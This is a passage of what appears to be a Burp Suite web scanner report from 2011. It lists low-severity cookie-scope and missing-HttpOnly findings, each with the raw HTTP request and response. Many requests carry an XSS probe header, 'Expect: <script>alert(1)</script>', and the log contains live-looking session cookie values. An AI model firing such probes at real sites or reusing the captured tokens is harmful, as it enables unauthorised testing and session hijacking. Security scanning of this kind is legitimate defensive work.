Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:56 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:55 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:56 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 137

#item_2 {
   width: 250px;
   height: 115px;
   }

#item_1 {
   width: 640px;
   height: 115px;
   }

#item_348 {
   width: 960px;
   height: 115px;
   }


14.37. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:55 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:57 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 6258


div#wrapper                                                        { margin:0px auto; width:960px; clear:both; border: 1px solid #333; }
div#container                                                    { width:960px; }
.header-outside div#wrapper                                        { border-width: 0 1px 1
...[SNIP]...

14.38. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:56 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:57 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 4516


.arial                            {font-family: Arial, sans-serif;}
.helvetica                        {font-family: Helvetica, sans-serif;}
.taho
...[SNIP]...

14.39. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:23 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:24 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...

14.40. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:28 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:29 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...

14.41. http://www.quiltersclubofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quiltersclubofamerica.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quiltersclubofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
CommunityServer: 4.1.31106.3070
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Tue, 03 May 2011 22:26:02 GMT; domain=quiltersclubofamerica.com; expires=Thu, 03-May-2012 03:26:02 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:02 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

14.42. http://www.quintura.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quintura.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quintura.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:19:04 GMT
Content-Type: image/x-icon
Content-Length: 10174
Last-Modified: Tue, 22 Jul 2008 00:53:00 GMT
Connection: keep-alive
Expires: Thu, 05 May 2011 01:19:04 GMT
Cache-Control: max-age=86400
Set-Cookie: PARTNERCOOK=Wd7VYk3AqYh4NBfKAz8HAg==; expires=Thu, 03-May-12 01:19:04 GMT; domain=quintura.com; path=/
Accept-Ranges: bytes

..............h...V...........h....... .... .....&    ........ ..    ............ .h...V#..(....... ...................................{. .k/d..*...4,..M...N...h...|...x>..hH..pX..Xy...%...,... ...:...F...
...[SNIP]...

14.43. http://www.reevoo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reevoo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reevoo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=NUWIZXSrev4CKIOU; domain=reevoo.com; path=/
Date: Wed, 04 May 2011 03:03:35 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 469
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

14.44. http://www.sescoops.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sescoops.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sescoops.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Wed, 04 May 2011 00:58:38 GMT
Content-Type: image/vnd.microsoft.icon
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 0
CF-Cache-Status: HIT
Expires: Wed, 04 May 2011 02:58:38 GMT
Cache-Control: public, max-age=7200
Set-Cookie: __cfduid=d401798d36bdc445a82e49984590307241304470718; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.sescoops.com
Set-Cookie: __cfduid=d401798d36bdc445a82e49984590307241304470718; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.sescoops.com


14.45. http://www.sportrider.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportrider.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sportrider.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2v0plonntdrfopz03nskuefi; path=/; HttpOnly
Set-Cookie: UserPuid=2338462636369171500; domain=sportrider.com; expires=Wed, 04-May-2061 02:20:13 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ...............................p.......................................{.......................}...............)...............................................?...
...[SNIP]...

14.46. http://www.st.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.st.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.st.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:17:28 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.4 mod_perl/1.26
Content-Type: text/html; charset=iso-8859-1
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Set-Cookie: BC_HA_32514F86D9DCF77D=10571F1_0; Domain=.st.com; expires=Wed, 04-May-11 03:35:39 GMT; Path=/
Content-Length: 366

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

14.47. http://www.staralliance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.staralliance.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.staralliance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:47:49 GMT
Server: Apache/2.2.15 (Unix) mod_jk2/2.0.4 mod_jk/1.2.30 PHP/5.3.3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 511
Via: 1.1 www.staralliance.com (Access Gateway 3.1.2-IR2663621-029B10BECF753007)
Set-Cookie: ZNPCQ003-32383800=5fd7b06d; path=/; domain=.staralliance.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

14.48. http://www.streetrodderweb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.streetrodderweb.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.streetrodderweb.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:21:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dchded55dstci345g1rmxj45; path=/; HttpOnly
Set-Cookie: UserPuid=2337717268547020875; domain=streetrodderweb.com; expires=Wed, 04-May-2061 01:21:44 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

14.49. http://www.thefreeiqtest.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefreeiqtest.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefreeiqtest.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Wed, 04 May 2011 01:52:26 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Tue, 28 Dec 2010 15:33:48 GMT
ETag: "cfc0d3f-4486-4987a2dc28f00"
Content-Length: 17542
CF-Cache-Status: HIT
Expires: Wed, 04 May 2011 03:52:26 GMT
Cache-Control: public, max-age=7200
Accept-Ranges: bytes
Set-Cookie: __cfduid=d728dce90a0eb648333c9394c9cbf73651304473946; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.thefreeiqtest.org
Set-Cookie: __cfduid=d728dce90a0eb648333c9394c9cbf73651304473946; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.thefreeiqtest.org

......00.... ..%..F... .... ......%........ ..    ...6........ .h....@..(...0...`..... ......%............................................................................................................
...[SNIP]...

14.50. http://www.tutorialblog.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tutorialblog.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tutorialblog.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: cloudflare-nginx
Date: Wed, 04 May 2011 00:45:43 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Location: http://tutorialblog.org/favicon.ico
Cache-Control: public, max-age=7200
Expires: Wed, 04 May 2011 02:45:43 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Set-Cookie: __cfduid=d8a7eb6214fbbc90b40ede30ff09a40301304469943; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.tutorialblog.org
Set-Cookie: __cfduid=d8a7eb6214fbbc90b40ede30ff09a40301304469943; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.tutorialblog.org
Content-Length: 329

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://tutorialblog.org
...[SNIP]...

14.51. http://www.whitepages.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.ca
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepages.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 03:16:56 GMT
Status: 200 OK
X-Runtime: 0.02728
ETag: "819b009dba80241e53c53603d55c1ce1"
Connection: keep-alive
Set-Cookie: wp_endemic_provider=B; domain=.whitepages.ca; path=/; expires=Wed, 04 May 2011 15:16:56 GMT
Set-Cookie: wp_perm=pid%3D93sYFnX8EeCdSQAfKQmSpg; domain=.whitepages.ca; path=/; expires=Thu, 03 May 2012 03:16:56 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.ca; path=/; expires=Thu, 03 May 2012 03:16:56 GMT
Set-Cookie: _wpn_sid=e070ab7070942dc475186e058fe80f9c; domain=.whitepages.ca; path=/
Content-Length: 15589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free Peo
...[SNIP]...

14.52. http://xcdn.xgraph.net/15530/db/xg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xcdn.xgraph.net
Path:   /15530/db/xg.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099 HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Apache-Coyote/1.1
Content-Length: 43
Expires: Wed, 04 May 2011 01:12:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:12:32 GMT
Connection: close
Set-Cookie: _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2; Domain=.xgraph.net; Expires=Sat, 03-May-2014 01:12:32 GMT; Path=/
Set-Cookie: _push4xgat=1304471552196; Domain=.xgraph.net; Expires=Thu, 05-May-2011 01:12:32 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

GIF89a.............!.......,...........D..;

15. Cookie without HttpOnly flag set  previous  next
There are 291 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



15.1. http://beam.to/index.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://beam.to
Path:   /index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.asp HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:14:59 GMT
Connection: close
Location: start.asp
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCCAQQAQ=EAJIDBLDECNPCJDLGOFAPAAA; path=/
Cache-control: private
Content-Length: 130

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="start.asp">here</a>.</body>

15.2. http://tracking.moon-ray.com/track.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/members/forgot-password&s=ysv9sd684163c3y&l=www.theamericanmonk.com/members/forgot-password&ti=Members%20-%20Forgot%20Password%20-%20The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/members/forgot-password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 00:55:22 GMT
Connection: Keep-Alive
Set-Cookie: sess_=ysv9sd684163c3y; path=/
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 168

